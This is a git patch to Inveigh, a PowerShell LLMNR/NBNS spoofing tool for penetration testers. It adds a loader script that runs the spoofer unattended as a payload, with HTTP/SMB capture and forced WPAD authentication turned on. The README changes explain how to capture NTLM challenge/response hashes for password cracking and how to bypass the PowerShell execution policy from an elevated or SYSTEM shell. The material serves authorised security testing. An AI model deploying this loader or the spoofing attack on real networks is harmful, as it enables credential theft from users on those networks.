From b7e2bb76537dd8c31feecbf817095a361914e55f Mon Sep 17 00:00:00 2001 From: Kevin Robertson Date: Wed, 5 Aug 2015 22:39:33 -0400 Subject: Added parameter for controlling output directory. Added first version of loader script for easier execution as a payload. Added '-OutputDir' parameter for controlling the output directory. Added 'Inveigh-Loader.ps1' script which has additional options for running Inveigh as an unattended payload. Performed some cleanup. Updated screenshot in readme. --- Inveigh-Loader.ps1 | 77 +++++++++++++++++++++++++++++++++++++++++++++++++++++ Inveigh.ps1 | Bin 71870 -> 73010 bytes README.md | 10 +++---- 3 files changed, 82 insertions(+), 5 deletions(-) create mode 100644 Inveigh-Loader.ps1 diff --git a/Inveigh-Loader.ps1 b/Inveigh-Loader.ps1 new file mode 100644 index 0000000..5e4f4ac --- /dev/null +++ b/Inveigh-Loader.ps1 @@ -0,0 +1,77 @@ +<# +.SYNOPSIS +Inveigh Loader provides additional options for running Inveigh as an unattended payload. + +.DESCRIPTION +Inveigh Loader can load Inveigh with set parameters and stop execution after specified amount of time. Inveigh can be either loaded as a separate script or through a scriptblock embedded within this script. If the scriptblock method is selected, the current Inveigh.ps1 code must be copied into the $inveigh_scriptblock below. This is a basic version, additional features will be added. +#> + +# Inveigh loader parameters +$run_length = 1 # Set the number of minutes Inveigh will run +$start_job_method = "filepath" # Set the Job-Start method. filepath,scriptblock + +# Inveigh parameters - refer to Inveigh.ps1 for details +$IP = "" +$SpooferIP = "" +$HTTP = "Y" +$HTTPS = "N" +$SMB = "Y" +$LLMNR = "Y" +$NBNS = "N" +$NBNSTypes = @("20") # Format for multiples = @("00","20") +$Repeat = "Y" +$ForceWPADAuth = "Y" +$Output = "0" +$OutputDir = "" + +if(-not($IP)) +{ + $IP = (Test-Connection 127.0.0.1 -count 1 | select -ExpandProperty Ipv4Address) +} + +if(-not($SpooferIP)) +{ + $SpooferIP = $IP +} + +if(-not($OutputDir)) +{ + $OutputDir = $PWD.Path +} + +$inveigh_scriptblock = +{ # begin $inveigh_scriptblock - paste Inveigh.ps1 code below this line if using $start_job_method = "scriptblock" + +} # end $inveigh_scriptblock + +try +{ + if ($start_job_method -eq "filepath") + { + Start-Job -Name Inveigh -FilePath .\Inveigh.ps1 -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null + } + elseif ($start_job_method -eq "scriptblock") + { + Start-Job -Name Inveigh -ScriptBlock $inveigh_scriptblock -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null + } + else + { + throw "Invalid $start_job_method." + } + + $run_timeout = new-timespan -Minutes $run_length + $run_stopwatch = [diagnostics.stopwatch]::StartNew() + + while ($run_stopwatch.elapsed -lt $run_timeout) + { + Receive-Job -name Inveigh + } + +} +finally +{ + Stop-Job -name Inveigh + Receive-Job -name Inveigh + Remove-Job -name Inveigh + write-warning "Inveigh Loader exited at $(Get-Date -format 's')" +} diff --git a/Inveigh.ps1 b/Inveigh.ps1 index 6bbb375..436d505 100644 Binary files a/Inveigh.ps1 and b/Inveigh.ps1 differ diff --git a/README.md b/README.md index c015622..2255b06 100644 --- a/README.md +++ b/README.md @@ -2,10 +2,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested with PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5. # Notes -1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture. +1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. 2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. 3. SMB challenge/response captures are performed by sniffing over the host system's SMB service. 4. HTTP challenge/response captures are performed with a dedicated listener. @@ -17,13 +17,13 @@ Tested with PowerShell 2.0 and .NET 3.5. 10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy. +Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. To execute with default settings: Inveigh.ps1 To execute with features enabled/disabled: -Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 +Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' # Screenshot -![Inveigh](https://cloud.githubusercontent.com/assets/5897462/7216149/c49679ce-e5c2-11e4-9825-2abacc56e91f.PNG) +![inveigh-screenshot2](https://cloud.githubusercontent.com/assets/5897462/9102520/62f199c4-3bc1-11e5-87a7-08837950a04f.PNG) -- cgit v1.2.3